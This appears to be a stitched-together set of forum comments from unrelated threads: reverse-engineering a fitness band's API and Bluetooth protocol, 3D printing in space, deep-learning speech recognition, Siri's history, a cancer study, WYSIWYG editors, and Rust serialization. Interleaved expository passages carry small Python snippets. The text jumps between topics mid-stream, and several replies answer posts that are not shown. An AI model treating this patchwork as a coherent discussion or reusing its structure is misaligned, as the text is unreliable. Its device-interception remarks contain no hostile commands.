I'll start. Jessica Livingston wrote a book called "Founders At Work" and it's one of my absolute favorites. I've nearly broken the binding on my copy with all the sticky-note page markers. Though my server will probably melt from the load, proof of my assertion is available.
Many folks might (mistakenly) see them as an admission that women can't hack it on a level playing field. Such thoughts would only serve to harden their chauvinistic mental models and cause gender discrimination to be more (rather than less) likely in the future.
I wanted to track my heart rate while I run. I didn't want to let a large company have direct access to my health information.
This is gold :) Nice write-up, Jeff.
So I'll just post a couple notes:
* auth appears to be using OAuth WRAP (deprecated as a spec, but Microsoft appears to use it for Live logins), so I'm sure could be pretty easily extracted for an API library
* As mentioned the API mostly talks to an endpoint on and the returns are gzipped JSON except for a PUT to prodwus0sts.blob.core.windows.net for the binary log of your actual data (there's a subsequent PUT that then sends the UploadId and some other metadata to the API server)
People have mentioned wanting to avoid sending your data to the cloud completely, and that should be completely possible. The easy way atm is that you could just mitm the endpoints and sync as normal w/ the app.
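Since the comment above notes that the API's returns are gzipped JSON, decoding a captured response body is pure stdlib Python. The payload here is made up purely for the round-trip demo; it is not the Band's actual schema:

```python
import gzip
import json

def decode_gzipped_json(body: bytes):
    """Decode a gzip-compressed JSON response body into a Python object."""
    return json.loads(gzip.decompress(body).decode("utf-8"))

# Round-trip demo with an invented payload standing in for a captured body:
payload = gzip.compress(json.dumps({"heartRate": 72}).encode("utf-8"))
print(decode_gzipped_json(payload))  # {'heartRate': 72}
```

The same decoding step would apply to bodies captured while mitm-ing the sync endpoints as described above.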
However, there are at least a couple of people who have successfully reverse-engineered the BTLE protocol, although I haven't seen anything fully published yet. This appears to mostly/primarily be based on digging through the Windows client's DLL.
Pic of source w/ some of the BT protocol: https://twitter.com/JustinAngel/status/527955001436418048
Some BT functions: https://twitter.com/JustinAngel/status/528383467742957571
Methods extracted from the dll: https://twitter.com/JustinAngel/status/529876592479047682
(On OSX, strings gives you significantly less useful information, although apparently it was built by 'ianhowle' and there's a native Objective-C "CargoKit" library)
Note, there's one open source project that has theming and plans on building live sensor output: http://unband.nachmore.com/
And there's a closed source phone already that does access all the sensor data in realtime: http://www.windowsphone.com/en-us/store/app/band-sensor-moni...
I'm not too familiar with Windows Phone, but I believe you can access and decompile an unencrypted XAP if you have a rooted Windows Phone to see what it's doing.
I don't really have much experience/use/access to Windows stuff in general, but for someone w/ that kind of experience, I can't imagine it being very hard to deconstruct.
That said, this is awesome. I just think that there are pros and cons to both and we shouldn't be focused only on 3D printing.
Seems like using this manufacturing approach would be a very tough sell for any real mission.
Only benefit of 3D printing at your destination is the ability to manufacture something that was overlooked, so contingency planning. (yea, yea, someday we'll mine the printable materials on site, right...)
For just about any other item that you know you need, it would be much more weight-effective (the golden measure in launch considerations) to just build the part here on earth, where you can maximize specific density and specific strength using materials that 3D printing can't touch. Plus you aren't lugging around a heavy 3D printer + raw materials.
As an engineer, my first thought when I saw what it printed was: how do you turn a bolt with a plastic wrench without breaking the wrench?
- https://gigaom.com/2014/12/18/baidu-claims-deep-learning-bre...
- http://www.forbes.com/sites/roberthof/2014/12/18/baidu-annou...
Breaking the network up like this would reduce training time and perhaps reduce the needed training data. Since the first layers could be trained without supervision, less labeled data would be needed to train the last two layers. It would also facilitate transferring models between problems; the output of the first few layers, like a word2vec, could be fed into arbitrary other machine learning problems, e.g., translation.
If this does not work, then how about training the whole model together, but only once? The final results are reported for an ensemble of six independently trained networks. What if we started by training one network, and then fixed its first three layers to train the other networks? (Instead of fixing the first layers, you could also just give them a slower learning rate, although it isn't clear whether that would save you much.)
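The fixed-early-layers idea can be illustrated with a toy two-parameter "network" in plain Python. This is only a sketch of freezing under gradient descent, not the paper's architecture:

```python
# Toy illustration of freezing early layers: a two-"layer" linear model
# y = w2 * (w1 * x), fit by gradient descent on one (x, target) pair.
# With freeze_w1=True, only w2 is updated; w1 stays fixed, mimicking
# reusing pretrained early layers while training later ones.

def train(w1, w2, x, target, lr=0.01, steps=200, freeze_w1=True):
    for _ in range(steps):
        hidden = w1 * x          # output of the (possibly frozen) early layer
        pred = w2 * hidden
        err = pred - target
        # gradient of 0.5 * err**2 w.r.t. w2 is err * hidden
        w2 -= lr * err * hidden
        if not freeze_w1:
            # gradient w.r.t. w1 flows back through w2
            w1 -= lr * err * w2 * x
    return w1, w2

w1, w2 = train(w1=2.0, w2=0.5, x=1.0, target=6.0)
print(w1, w2)  # w1 stays exactly 2.0; w2 converges toward 3.0
```

In a real framework the same effect comes from excluding the early layers' parameters from the optimizer (or zeroing their gradients).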
Congrats to Carl, Sanjeev, Andrew, and the others.
This is still very cool, but that comparison doesn't seem fair at all.
Oct 5: Steve Jobs dies
One kind of side note. On October 5th, Steve Jobs died. He had been involved in a lot of the process leading up to it. We know that he was watching this launch from his house. I don't know what he thought about it, but I like to project that he saw it, said "It is good. This is the future, Apple's in the middle of it. I can go now." I don't know if that's true, but that's a projection that I like to put onto it.
Walking backward in time, Adam discussed the technical history of Siri as well as how the vision of virtual personal assistants evolved over time. He wowed the audience with a 1987 video of a concept from Apple that predicted a Siri-like device 24 years in the future, and it was only off by two weeks.
Is this only me? I'm not blocking cookies or anything like that.
I note that the lead author of the study, Linda E. Carlson, is part of a group of cancer researchers promoting "integrative" approaches to cancer treatment. Another cancer researcher commenting on this approach thinks that "integrative" cancer therapy so far promises much more than it can actually deliver in improved patient outcomes. The original headline of the Fast Company article submitted here, already changed by the Hacker News moderation team, is surely wrong, and it's not at all clear that this extraordinary claim will replicate if an independent group of researchers attempt to replicate the results. If I or any of my loved ones should happen to have a case of cancer (which is rather rare in my family), I will ask for advice on how to treat it from a doctor who practices science-based medicine.
this is a crummy article with a crummy headline about one single study which may or may not also be crummy
Exposure to radiation can change your DNA.
Heck, everything can change (read: mutate) your DNA.
They'll see a highlighted word or sentence with a bold font, wider spacing and a blue background. So they set the background blue, the font bold and the spacing wider. But really, the editor should provide an intuitive way to apply the <span class="highlight"> element.
Some editors out there do this, but they generally suck in other areas. Wysihtml seems to apply inline CSS. Can it easily apply a class too?
The Voog team
We have so many choices when it comes to WYSIWYG. My favorite is https://github.com/daviferreira/medium-editor.
I can do paragraphs by not manually breaking lines and instead select the second paragraph's content, then apply the "normal text" style, but this isn't exactly intuitive.
Or the editor could disallow further manual line breaks and just create a new paragraph whenever you enter one.
This implies it isn't configurable, and unfortunately, in my view, this is the wrong direction to unify in.
Hasn't even MS Word nowadays standardized on Enter = paragraph break, Shift+Enter = line break?
# Clicking the "no-color" option in the text color-picker doesn't do anything.
# Using the "remove" option on a link inserts a space as well as removing the link, which seems incorrect.
# Using the "remove" option on a link doesn't always remove the entire link. Repro on http://wysihtml.com/ by selecting the word "typewriter", adding a link, then clicking on it again and removing the link. Depending on where you clicked either "type" or "writer" will still be linked.
# Repeatedly toggling tags can get weird. e.g. select a word and keep on clicking the bold/italic/underline button, and note how it'll toggle the tag on, toggle it off, and then just start adding spaces in front of it with every subsequent click.
# Possibly related to the spaces issue, after toggling tags for a bit, checking the generated source shows a lot of empty tags, which is kind of messy.
Author plans to update it to use wysihtml as a drop-in replacement.
CKEditor has had the ACF (Advanced Content Filter) for >1.5 years now. It allows you to very tightly control which tags and attributes are allowed.
This feature, and the rest of CKEditor, has much, much more test coverage to account for the many browser quirks (notably in contentEditable) that they have had to work around, to prevent regressions. It's a waste of time for everybody to solve the same problems and work around the same browser quirks over and over again.
The "Ability to add uneditable area inside editor text flow (useful when building modules like video tools, advanced image editor etc)." feature is probably the only interesting one. But it's nothing compared to CKEditor Widgets, which does exactly this, and much more (think storing structured content but transforming it to the specific markup that a frontend developer wants). Just compare Wysihtml's "advanced" demo to the CKEditor Widgets demo: http://docs.ckeditor.com/#!/guide/dev_widgets
See http://docs.ckeditor.com/#!/guide/dev_advanced_content_filte... for more about ACF and http://docs.ckeditor.com/#!/guide/dev_widgets for more about Widgets.
And yes, it's open source: GPL/LGPL/MPL/commercial: http://ckeditor.com/about/license
If we collaborated more rather than reinventing the wheel, we'd get so much further. One does not simply write a WYSIWYG editor.
Try out their beautiful working app: http://voog.com
but why no jquery?
As someone who ported an embedded website away from jQuery: it was painful, and I've come to really appreciate it.
Well, that sums that up pretty succinctly. :)
> "... columnarization, a technique from the database community for laying out structured records in a format that is more convenient for serialization than the records themselves."
Column stores, in comparison to row stores, don't offer any serialization benefit per se. The main benefits are the following; I will use a record (A,B,C,D,E) as an example, with all fields of type u32 (4 bytes):
* If you only use some fields, you have to load less data from memory/disk into the CPU cache, and your working set is more likely to fit in cache. For example, when filtering only the records where A=22 and B=45, you only have to actually load n*(sizeof(A)+sizeof(B)) = n*8 bytes instead of n*record_size = n*20. This can make a very significant difference.
* When using compression to reduce the size of data, columns can often be compressed better because they only contain data of the same type and nature, and thus probably share similarities. With such a small record consisting only of integers it probably won't make a difference. But if, e.g., some fields are country abbreviations, textual descriptions, or ids, one could easily imagine that there are gains.
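The bytes-touched arithmetic in the first bullet can be made concrete with a toy Python sketch (purely illustrative; a real column store scans packed buffers, not Python lists):

```python
# Row vs. column layout for the filter A == 22 and B == 45, counting how
# many bytes of field data the scan touches, assuming 4-byte u32 fields
# as in the (A,B,C,D,E) example above.

rows = [(22, 45, 1, 2, 3), (9, 9, 9, 9, 9), (22, 45, 0, 0, 0)]

# Column layout: one list per field.
cols = {name: [r[i] for r in rows] for i, name in enumerate("ABCDE")}

# The filter only reads columns A and B.
matches = [i for i, (a, b) in enumerate(zip(cols["A"], cols["B"]))
           if a == 22 and b == 45]

n = len(rows)
bytes_touched_columnar = n * (4 + 4)   # only A and B: n * 8
bytes_touched_row = n * 5 * 4          # whole records: n * 20

print(matches)                 # [0, 2]
print(bytes_touched_columnar)  # 24
print(bytes_touched_row)       # 60
```

The 8-vs-20 bytes-per-record ratio is exactly the n*8 vs. n*20 figure from the bullet above.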
Coming back to the point about serialization: using the technique described in the blog post, there won't be a performance difference between column storage and row storage (e.g. using a struct). The method described in the blog post just lets the data array of the original vector be wrapped by a Vec<u8> without even moving the memory, so the method is independent of the data type stored in the vectors. Of course it will only work for data types that do not contain references, otherwise we could get illegal memory accesses after deserialization (which is guaranteed by the Rust type system, because only Copy types are allowed).
The only thing this benchmark is testing is how fast a vector can be initialized.
There can be a space improvement from keeping the data in a column layout compared to a row layout with normal structs. Structs normally align their total size to the alignment of the largest field. A struct containing an i64 and an i8 would contain 7 bytes of padding. In a column layout this overhead is avoided. Still, there would not be an improvement in this serialization scheme, as it does not actually copy any data.
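Python's struct module can demonstrate the i64+i8 padding point: '@' uses native C alignment (so fields get padded as in a C struct), while '=' packs fields back-to-back, which is effectively what a per-column layout achieves. The exact padded size depends on the platform ABI:

```python
import struct

# i8 followed by i64: native alignment ('@') inserts padding before the
# 8-byte field; standard mode ('=') packs the fields with no padding.
padded = struct.calcsize("@bq")  # e.g. 16 on x86-64
packed = struct.calcsize("=bq")  # always 1 + 8 = 9
print(padded, packed)
```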
Instead of (uint, int) we could have (int, sint) or (uint, sint).
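Assuming the (uint, int, sint) here refers to protobuf-style varint scalar types, what makes sint cheaper for negative values is zigzag encoding: small magnitudes of either sign map to small unsigned values, which then encode as short varints. A minimal sketch:

```python
# Protobuf-style zigzag encoding for 64-bit signed integers:
# 0 -> 0, -1 -> 1, 1 -> 2, -2 -> 3, 2 -> 4, ...

def zigzag_encode(n: int) -> int:
    # n >> 63 is 0 for non-negative n and -1 (all ones) for negative n.
    return (n << 1) ^ (n >> 63)

def zigzag_decode(z: int) -> int:
    return (z >> 1) ^ -(z & 1)

print([zigzag_encode(n) for n in (0, -1, 1, -2, 2)])  # [0, 1, 2, 3, 4]
```

A plain two's-complement "int" would encode -1 as a maximal 10-byte varint, which is why sint exists as a separate type.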
The next step is to get the cryogenic upper stage to actually provide the critical thrust that will finally power it into a geosynchronous orbit. On this mission it was bolted on but passive.